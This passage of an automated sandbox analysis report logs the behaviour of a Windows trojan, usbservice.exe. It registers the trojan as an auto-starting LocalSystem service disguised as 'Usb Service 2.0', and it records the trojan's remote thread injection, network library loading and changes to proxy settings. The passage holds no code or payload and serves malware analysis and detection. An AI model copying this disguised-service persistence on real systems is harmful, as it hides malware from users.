HKLM\System\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control	ActiveService	TapiSrv
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_USB_SERVICE_2.0\0000\Control	ActiveService	Usb Service 2.0
HKLM\System\CurrentControlSet\Services\Usb Service 2.0	Description	Usb Service 2.0
HKLM\System\CurrentControlSet\Services\Usb Service 2.0	DisplayName	Usb Service 2.0
HKLM\System\CurrentControlSet\Services\Usb Service 2.0	ErrorControl	0
HKLM\System\CurrentControlSet\Services\Usb Service 2.0	FailureActions	0x0a0000000000000000000000010000000000000001000000b80b0000
HKLM\System\CurrentControlSet\Services\Usb Service 2.0	ImagePath	"C:\WINDOWS\usbservice.exe"
HKLM\System\CurrentControlSet\Services\Usb Service 2.0	ObjectName	LocalSystem
HKLM\System\CurrentControlSet\Services\Usb Service 2.0	Start	2
HKLM\System\CurrentControlSet\Services\Usb Service 2.0	Type	272
HKLM\System\CurrentControlSet\Services\Usb Service 2.0\Security	Security	0x01001480900000009c000000140000003000000002001c00010000000280

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0303\4&2C5A7332&0	ClassGUID	{4D36E96B-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0400\4&2C5A7332&0	ClassGUID	{4D36E978-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0501\1	ClassGUID	{4D36E978-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0700\4&2C5A7332&0	ClassGUID	{4D36E969-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0A03\1	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0F13\4&2C5A7332&0	ClassGUID	{4D36E96F-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ACPI_HAL\PNP0C08\0	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\DISPLAY\DEFAULT_MONITOR\4&2946A9FF&0&11223344&00&02	ClassGUID	{4D36E96E-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\IDE\CDROMQEMU_QEMU_CD-ROM________________________0.9.____\4D51303030302033202020202020202020202020	ClassGUID	{4D36E965-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\IDE\DISKQEMU_HARDDISK___________________________0.9.1___\4D51303030302031202020202020202020202020	ClassGUID	{4D36E967-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ISAPNP\READDATAPORT\0	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\LPTENUM\MICROSOFTRAWPORT\5&34A37E9F&0&LPT1	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCIIDE\IDECHANNEL\4&3DE75EA&0&0	ClassGUID	{4D36E96A-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCIIDE\IDECHANNEL\4&3DE75EA&0&1	ClassGUID	{4D36E96A-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_1013&DEV_00B8&SUBSYS_00000000&REV_00\3&13C0B0C5&0&10	ClassGUID	{4D36E968-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\3&13C0B0C5&0&18	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	2
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\3&13C0B0C5&0&18	DeviceDesc	Realtek RTL8029(AS)-based Ethernet Adapter (Generic)	2
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\3&13C0B0C5&0&18	Driver	{4D36E972-E325-11CE-BFC1-08002BE10318}\0001	2
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_8086&DEV_1237&SUBSYS_00000000&REV_02\3&13C0B0C5&0&00	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_8086&DEV_7000&SUBSYS_00000000&REV_00\3&13C0B0C5&0&08	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_8086&DEV_7010&SUBSYS_00000000&REV_00\3&13C0B0C5&0&09	ClassGUID	{4D36E96A-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\ACPI_HAL\0000	ClassGUID	{4D36E966-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\DMIO\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\FTDISK\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_AFD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_BEEP\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_DMBOOT\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_DMLOAD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_FIPS\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_GPC\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_HTTP\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_IPNAT\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_IPSEC\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_KSECDD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_MNMDD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_MOUNTMGR\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDISTAPI\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDISUIO\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDIS\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NDPROXY\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NETBT\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_NULL\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_PARTMGR\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_PARVDM\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_RASACD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_RDPCDD\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_TCPIP\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_VGASAVE\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_VOLSNAP\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\LEGACY_WANARP\0000	ClassGUID	{8ECC055D-047F-11D1-A537-0000F8753ED1}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMACM	ClassGUID	{4D36E96C-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMDRV	ClassGUID	{4D36E96C-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMMCI	ClassGUID	{4D36E96C-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMVCD	ClassGUID	{4D36E96C-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MEDIA\MS_MMVID	ClassGUID	{4D36E96C-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_L2TPMINIPORT\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIP\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	2
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIP\0000	DeviceDesc	WAN Miniport (IP)	2
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIP\0000	Driver	{4D36E972-E325-11CE-BFC1-08002BE10318}\0008	2
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PPPOEMINIPORT\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PPTPMINIPORT\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PSCHEDMP\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PSCHEDMP\0001	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PTIMINIPORT\0000	ClassGUID	{4D36E972-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\RDPDR\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\RDP_KBD\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\RDP_MOU\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\SYSTEM\0000	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\SYSTEM\0001	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\ROOT\SYSTEM\0002	ClassGUID	{4D36E97D-E325-11CE-BFC1-08002BE10318}	1
HKLM\SYSTEM\CONTROLSET001\ENUM\STORAGE\VOLUME\1&30A96598&0&SIGNATURE95619561OFFSET7E00LENGTH13F291800	ClassGUID	{71A27CDD-812A-11D0-BEC7-08002BE2092F}	1
HKLM\SYSTEM\CONTROLSET001\SERVICES\PlugPlay	PlugPlayServiceType	3	1
HKLM\SYSTEM\CONTROLSET001\SERVICES\RasMan\Enum	0	Root\LEGACY_RASMAN\0000	3
HKLM\SYSTEM\CONTROLSET001\SERVICES\RasMan\Enum	Count	1	6
HKLM\SYSTEM\CONTROLSET001\SERVICES\RpcSs\Enum	0	Root\LEGACY_RPCSS\0000	1
HKLM\SYSTEM\CONTROLSET001\SERVICES\RpcSs\Enum	Count	1	2
HKLM\SYSTEM\CONTROLSET001\SERVICES\TapiSrv\Enum	0	Root\LEGACY_TAPISRV\0000	2
HKLM\SYSTEM\CONTROLSET001\SERVICES\TapiSrv\Enum	Count	1	4
HKLM\SYSTEM\CONTROLSET001\SERVICES\Usb Service 2.0\Enum	0	Root\LEGACY_USB_SERVICE_2.0\0000	2
HKLM\SYSTEM\CONTROLSET001\SERVICES\Usb Service 2.0\Enum	Count	1	4
HKLM\SYSTEM\WPA\MediaCenter	Installed	0	1
HKLM\System\CurrentControlSet\Control\Windows	NoInteractiveServices	0	1
HKLM\System\CurrentControlSet\Services\PlugPlay	ObjectName	LocalSystem	1
HKLM\System\CurrentControlSet\Services\RasMan	ImagePath	%SystemRoot%\system32\svchost.exe -k netsvcs	1
HKLM\System\CurrentControlSet\Services\RasMan	ObjectName	LocalSystem	2
HKLM\System\CurrentControlSet\Services\RpcSs	ObjectName	NT Authority\NetworkService	1
HKLM\System\CurrentControlSet\Services\TapiSrv	ImagePath	%SystemRoot%\System32\svchost.exe -k netsvcs	1
HKLM\System\CurrentControlSet\Services\TapiSrv	ObjectName	LocalSystem	2
HKLM\System\CurrentControlSet\Services\Usb Service 2.0	ImagePath	"C:\WINDOWS\usbservice.exe"	2
HKLM\System\CurrentControlSet\Services\Usb Service 2.0	ObjectName	LocalSystem	2

4.b) services.exe - File Activities

	- Files Created:

pipe\net\NtControlPipe9

	- Files Read:

C:\ntsvcs, Flags: Named pipe

pipe\net\NtControlPipe9

	- Files Modified:

C:\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER, Flags: Named pipe

C:\WINDOWS\system32\config\SysEvent.Evt

C:\ntsvcs, Flags: Named pipe

	- File System Control Communication:

File	Control Code	Times
pipe\net\NtControlPipe9	0x00110008	1
pipe\net\NtControlPipe9	0x0011C017	1
C:\net\NtControlPipe4, Flags: Named pipe	0x0011C017	2
C:\ntsvcs, Flags: Named pipe	0x0011001C	4

	- Memory Mapped Files:

File Name

C:\WINDOWS\usbservice.exe

C:\Windows\AppPatch\sysmain.sdb

4.c) services.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\WINDOWS\usbservice.exe
	"C:\WINDOWS\usbservice.exe"

	- Remote Threads Created:

Affected Process

C:\WINDOWS\usbservice.exe

	- Foreign Memory Regions Read:

Process: C:\WINDOWS\usbservice.exe

	- Foreign Memory Regions Written:

Process: C:\WINDOWS\usbservice.exe

5. usbservice.exe

	- General information about this executable

Analysis Reason:	Started by services.exe
Filename:	usbservice.exe
MD5:	647a10168f2ab6afbbe28fc59926f99e
SHA-1:	1f26be732b65825855d444dc40cbc29c57c3a887
File Size:	172032 Bytes
Command Line:	"C:\WINDOWS\usbservice.exe"
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\MSVBVM60.DLL	0x73420000	0x00153000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\msctfime.ime	0x755C0000	0x0002E000
C:\WINDOWS\system32\version.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\SXS.DLL	0x7E720000	0x000B0000

	- Ikarus Virus Scanner

Trojan.Win32.Agent2 (Sig-Id:26204189)

5.a) usbservice.exe - Registry Activities

	- Registry Values Read:

Key	Name	Value	Times
HKLM\Software\Microsoft\Windows NT\CurrentVersion\IMM	Ime File	msctfime.ime	1
HKLM\System\CurrentControlSet\Control\Nls\Codepage	932	c_932.nls	1
HKLM\System\CurrentControlSet\Control\Nls\Codepage	936	c_936.nls	1
HKLM\System\CurrentControlSet\Control\Nls\Codepage	949	c_949.nls	1
HKLM\System\CurrentControlSet\Control\Nls\Codepage	950	c_950.nls	1
HKU\S-1-5-18\Control Panel\International	sDecimal	.	1

5.b) usbservice.exe - File Activities

	- Device Control Communication:

File	Control Code	Times
unnamed file	0x00390008	7

	- Memory Mapped Files:

File Name

C:\WINDOWS\system32\SXS.DLL

C:\WINDOWS\system32\msctfime.ime

C:\WINDOWS\system32\netmsg.dll

C:\WINDOWS\system32\rpcss.dll

C:\WINDOWS\usbservice.exe

5.c) usbservice.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\WINDOWS\usbservice.exe
	C:\WINDOWS\usbservice.exe

	- Remote Threads Created:

Affected Process

C:\WINDOWS\usbservice.exe

	- Foreign Memory Regions Read:

Process: C:\WINDOWS\usbservice.exe

	- Foreign Memory Regions Written:

Process: C:\WINDOWS\usbservice.exe

5.d) usbservice.exe - Other Activities

	- Windows SEH exceptions:

Description	Times
Exception 0xc000008f (STATUS_FLOAT_INEXACT_RESULT) at 0x7c812aeb	15

6. usbservice.exe

	- General information about this executable

Analysis Reason:	Started by usbservice.exe
Filename:	usbservice.exe
MD5:	647a10168f2ab6afbbe28fc59926f99e
SHA-1:	1f26be732b65825855d444dc40cbc29c57c3a887
File Size:	172032 Bytes
Command Line:	C:\WINDOWS\usbservice.exe
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\WSOCK32.dll	0x71AD0000	0x00009000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\Normaliz.dll	0x003B0000	0x00009000
C:\WINDOWS\system32\odbcint.dll	0x00C80000	0x00017000
C:\WINDOWS\system32\iertutil.dll	0x42990000	0x00045000
C:\WINDOWS\system32\wininet.dll	0x42C10000	0x000CF000
C:\WINDOWS\system32\urlmon.dll	0x42CF0000	0x00127000
C:\WINDOWS\system32\dot3api.dll	0x478C0000	0x0000A000
C:\WINDOWS\system32\netapi32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\OneX.DLL	0x5DCA0000	0x00028000
C:\WINDOWS\system32\eappprxy.dll	0x5DCD0000	0x0000E000
C:\WINDOWS\system32\ESENT.dll	0x606B0000	0x0010D000
C:\WINDOWS\system32\hnetcfg.dll	0x662B0000	0x00058000
C:\WINDOWS\System32\mswsock.dll	0x71A50000	0x0003F000
C:\WINDOWS\System32\wshtcpip.dll	0x71A90000	0x00008000
C:\WINDOWS\system32\mpr.dll	0x71B20000	0x00012000
C:\WINDOWS\system32\SAMLIB.dll	0x71BF0000	0x00013000
C:\WINDOWS\system32\sensapi.dll	0x722B0000	0x00005000
C:\WINDOWS\system32\QUtil.dll	0x726C0000	0x00016000
C:\WINDOWS\system32\EapolQec.dll	0x72810000	0x0000B000
C:\WINDOWS\system32\WZCSAPI.DLL	0x73030000	0x00010000
C:\WINDOWS\system32\dot3dlg.dll	0x736D0000	0x00006000
C:\WINDOWS\system32\icmp.dll	0x74290000	0x00004000
C:\WINDOWS\system32\odbc32.dll	0x74320000	0x0003D000
C:\WINDOWS\system32\eappcfg.dll	0x745B0000	0x00022000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\WINSTA.dll	0x76360000	0x00010000
C:\WINDOWS\system32\comdlg32.dll	0x763B0000	0x00049000
C:\WINDOWS\system32\netshell.dll	0x76400000	0x001A5000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\ATL.DLL	0x76B20000	0x00011000
C:\WINDOWS\system32\WINMM.dll	0x76B40000	0x0002D000
C:\WINDOWS\system32\psapi.dll	0x76BF0000	0x0000B000
C:\WINDOWS\system32\credui.dll	0x76C00000	0x0002E000
C:\WINDOWS\system32\WMI.dll	0x76D30000	0x00004000
C:\WINDOWS\system32\MPRAPI.dll	0x76D40000	0x00018000
C:\WINDOWS\system32\iphlpapi.dll	0x76D60000	0x00019000
C:\WINDOWS\system32\adsldpc.dll	0x76E10000	0x00025000
C:\WINDOWS\system32\rtutils.dll	0x76E80000	0x0000E000
C:\WINDOWS\system32\rasman.dll	0x76E90000	0x00012000
C:\WINDOWS\system32\TAPI32.dll	0x76EB0000	0x0002F000
C:\WINDOWS\system32\RASAPI32.dll	0x76EE0000	0x0003C000
C:\WINDOWS\system32\dnsapi.dll	0x76F20000	0x00027000
C:\WINDOWS\system32\WTSAPI32.dll	0x76F50000	0x00008000
C:\WINDOWS\system32\WLDAP32.dll	0x76F60000	0x0002C000
C:\WINDOWS\System32\winrnr.dll	0x76FB0000	0x00008000
C:\WINDOWS\system32\rasadhlp.dll	0x76FC0000	0x00006000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\SETUPAPI.dll	0x77920000	0x000F3000
C:\WINDOWS\system32\CRYPT32.dll	0x77A80000	0x00095000
C:\WINDOWS\system32\MSASN1.dll	0x77B20000	0x00012000
C:\WINDOWS\system32\msv1_0.dll	0x77C70000	0x00024000
C:\WINDOWS\system32\ACTIVEDS.dll	0x77CC0000	0x00032000
C:\WINDOWS\system32\netman.dll	0x77D00000	0x00033000
C:\WINDOWS\system32\DHCPCSVC.DLL	0x7D4B0000	0x00022000
C:\WINDOWS\system32\WZCSvc.DLL	0x7DB10000	0x0008C000

	- Ikarus Virus Scanner

Trojan.Win32.Agent2 (Sig-Id:26204189)

6.a) usbservice.exe - Registry Activities

	- Registry Keys Created:

HKLM\SOFTWARE\Microsoft\ESENT\Process\usbservice

HKLM\SOFTWARE\Microsoft\ESENT\Process\usbservice\DEBUG

	- Registry Keys Created Or Opened:

HKLM\SOFTWARE\CLASSES

	- Registry Values Deleted:

Key	Name
HKLM\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions	GON

	- Registry Values Modified:

Key	Name	New Value
HKLM\SOFTWARE\Microsoft\ESENT\Process\usbservice\DEBUG	Trace Level
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil	Active	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil	ControlFlags	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil	LogSessionName	stdout
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier	BitNames	Error Unusual Info Debug
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier	Guid	8aefce96-4618-42ff-a057-3536aa78233e
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg	Active	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg	ControlFlags	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg	LogSessionName	stdout
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier	BitNames	Error Unusual Info Debug
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier	Guid	5f31090b-d990-4e91-b16d-46121d0255aa
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy	Active	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy	ControlFlags	1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy	LogSessionName	stdout
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier	BitNames	Error Unusual Info Debug
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier	Guid	5f31090b-d990-4e91-b16d-46121d0255aa
HKLM\SYSTEM\CURRENTCONTROLSET\HARDWARE PROFILES\CURRENT\Software\Microsoft\windows\CurrentVersion\Internet Settings	ProxyEnable	0
HKLM\SYSTEM\CurrentControlSet\Control	WaitToKillServiceTimeout	7000
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\ESENT	CategoryCount	16
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\ESENT	CategoryMessageFile	C:\WINDOWS\system32\ESENT.dll
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\ESENT	EventMessageFile	C:\WINDOWS\system32\ESENT.dll
HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\ESENT	TypesSupported	7
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Common AppData	C:\Documents and Settings\All Users\Application Data
HKU\S-1-5-18\Software\Microsoft\Windows NT\CurrentVersion\Winlogon	ParseAutoexec	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	AppData	C:\WINDOWS\system32\config\systemprofile\Application Data
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cookies	C:\Documents and Settings\LocalService\Cookies
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	History	C:\Documents and Settings\LocalService\Local Settings\History
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	AutoDetect	0
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	IntranetName	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ProxyBypass	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	UNCAsIntranet	1
HKU\S-1-5-18\Software\Microsoft\windows\CurrentVersion\Internet Settings	ProxyEnable	0
HKU\S-1-5-18\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	DefaultConnectionSettings	0x460000000100000001000000000000000000000000000000040000000000
HKU\S-1-5-18\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	SavedLegacySettings	0x460000000300000009000000000000000000000000000000000000000000

	- Registry Values Read:

